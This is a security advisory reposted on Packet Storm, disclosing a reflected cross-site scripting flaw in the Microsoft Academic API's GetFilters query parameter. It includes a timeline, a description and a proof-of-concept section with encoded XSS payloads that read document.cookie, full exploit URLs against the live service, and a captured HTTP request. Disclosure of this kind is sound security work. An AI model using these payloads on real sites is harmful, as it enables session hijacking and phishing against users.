what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Academic Microsoft API Query Filter Cross Site Scripting

Academic Microsoft API Query Filter Cross Site Scripting
Posted Jan 23, 2018
Authored by Vulnerability Laboratory, Lawrence Amer | Site vulnerability-lab.com

The Academic Microsoft API query filter suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 315383ba3e443caa8589754c91b95a8a02f5b8a130671657e14cbdfe748ada1b

Academic Microsoft API Query Filter Cross Site Scripting

Change Mirror Download
Document Title:
===============
Acadmic Microsoft - API Query Filter Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2056

MSRC ID: 0001010174


Release Date:
=============
2018-01-20


Vulnerability Laboratory ID (VL-ID):
====================================
2056


Common Vulnerability Scoring System:
====================================
3.2


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500a! - 1.000a!


Product & Service Introduction:
===============================
Microsoft Academic is a free public search engine for academic publications and literature, developed by Microsoft Research.
Re-launched in 2016, the tool features an entirely new data structure and search engine using semantic search technologies
and it currently indexes over 150 million entities. The Academic Knowledge API offers information retrieval from the
underlying database using REST endpoints for advanced research purposes.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Microsoft_Academic )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side vulnerability in the official Microsoft Academic online service web-application.


Vulnerability Disclosure Timeline:
==================================
2017-04-09: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2017-04-10: Vendor Notification (Microsoft Security Response Center Team)
2017-04-11: Vendor Response/Feedback (Microsoft Security Response Center Team)
2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) - Unresponsive ??!
2018-**-**: Vendor Fix/Patch (Microsoft Service Developer Team) - Unresponsive ??!
2018-01-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corporation
Product: Academic - Online Service (Web-Application) 2017 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official Microsoft Academic online service web-application.
The vulnerability typ allows remote attackers to inject own malicious script code to client-side browser to application web requests.

The cross site scripting vulnerability is located in the api of the web-application. Remote attackers are able to exploit via vulnerable
`api/search/Getfilters` to byoass the current xss restriction filter. Thus allows the remote attacker to inject and execute client-side
cross site scripting payloads. The request method to inject is GET and the attack vector is non-persistent.

The security risk of the cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the client-side cross site vulnerability requires no privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious sources and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /api/search/Getfilters

Vulnerable Parameter(s):
[+] query

Affected Module(s):
[+] Current XSS Filter Protection


Proof of Concept (PoC):
=======================
The client-side cross site vulnerability can be exploited by remote attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Manual
1. Attackers can bypass the xss filter by using this payload through query api system.
"%40%27%3E%3Cimg%20src=evil.source%20onerror=prompt(document.cookie)%3E%40"
2. Attackers can use the current url to execute the prompt dialog with successful response of xss payload execution


PoC: Exploitation
https://academic.microsoft.com/api/search/GetFilters?query=%40%27%3E%3Cimg%20src=evil.source%20onerror=prompt(document.cookie)%3E%40&correlationId=undefined
https://academic.microsoft.com/api/search/GetFilters?query=%40%27%3E%3Cimg%20src=evil.source%20onerror=prompt(document.domain)%3E%40&correlationId=undefined


PoC: Vulnerable Source
{
"message": "No HTTP resource was found that matches the request URI
'https://academic.microsoft.com/api/search/GetFilters?query=%40'><<><iframe src http:%2F%2Fevil.source><%2Fiframe>%40&correlationId=undefined'."
}


--- PoC Session Logs [GET] ---
GET /api/search/GetFilters?query=%40%27%3E%3C%3Ciframe%20src%20http%3A%2F%2Fevil.source%3E%3C%2Fiframe%3E%40&correlationId=undefined HTTP/1.1
Host: academic.microsoft.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: https://academic.microsoft.com/
Cookie: utag_main=v_id:015b543cdafd00b14436aadab8900104400390090086e$_sn:1$_ss:0$_st:1491768750447$ses_id:1491766926079%3B
exp-session$_pn:2%3Bexp-session; s_norv=1491766950419-New; s_vnum=1493611200871%26vn%3D1; s_invisit=true; s_dslv=1491766950423;
s_dslv_s=First%20Visit; s_ppn=mpdacad%3Aen-us%3Aregister; s_ppvl=mpdacad%253Aen-us%253Alogin%2C100%2C89%2C643%2C1355%2C621%2C1366%2C768%2C1%2CP;
s_ppv=mpdacad%253Aen-us%253Aregister%2C100%2C92%2C675%2C1355%2C621%2C1366%2C768%2C1%2CP; s_fid=2DCC642E0324D787-3D30FA055450DC93;
s_cc=true; s_sq=msstompdacad%3D%2526c.%2526a.%2526activitymap.%2526page%253Dmpdacad%25253Aen-
us%25253Aregister%2526link%253DSign%252520up%252520with%252520Microsoft%252520account%2526region%253Dmain%2526pageIDType%253D1%2526.
activitymap%2526.a%2526.c%2526pid%253Dmpdacad%25253Aen-us%25253Aregister%2526pidt%253D1%2526oid%253DSign%252520up%252520with%252520
Microsoft%252520account%2526oidt%253D3%2526ot%253DSUBMIT; AMCV_EA76ADE95776D2EC7F000101%40AdobeOrg=
-179204249%7CMCMID%7C28933220378893493633963593270039587370; MSFPC=ID=d9c52c60bfa3454780dd8fed1ee6d500&CS=1&LV=201704&V=1;
msacademic=da629bfe-3e6a-4e63-8c85-d684ae83d1d6
Connection: close
-
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 09 Apr 2017 12:55:23 GMT
Connection: close
Content-Length: 230



Reference(s):
https://academic.microsoft.com/
https://academic.microsoft.com/api/
https://academic.microsoft.com/api/search/
https://academic.microsoft.com/api/search/GetFilters


Solution - Fix & Patch:
=======================
2018-**-**: Security Acknowledgements (Microsoft Security Response Center Team) - Unresponsive


Security Risk:
==============
The security risk of the non-persistent cross site scripting web vulnerability is estimated as medium. (CVSS 3.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer (http://lawrenceamer.me)
Profile: https://www.vulnerability-lab.com/show.php?user=Lawrence Amer


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close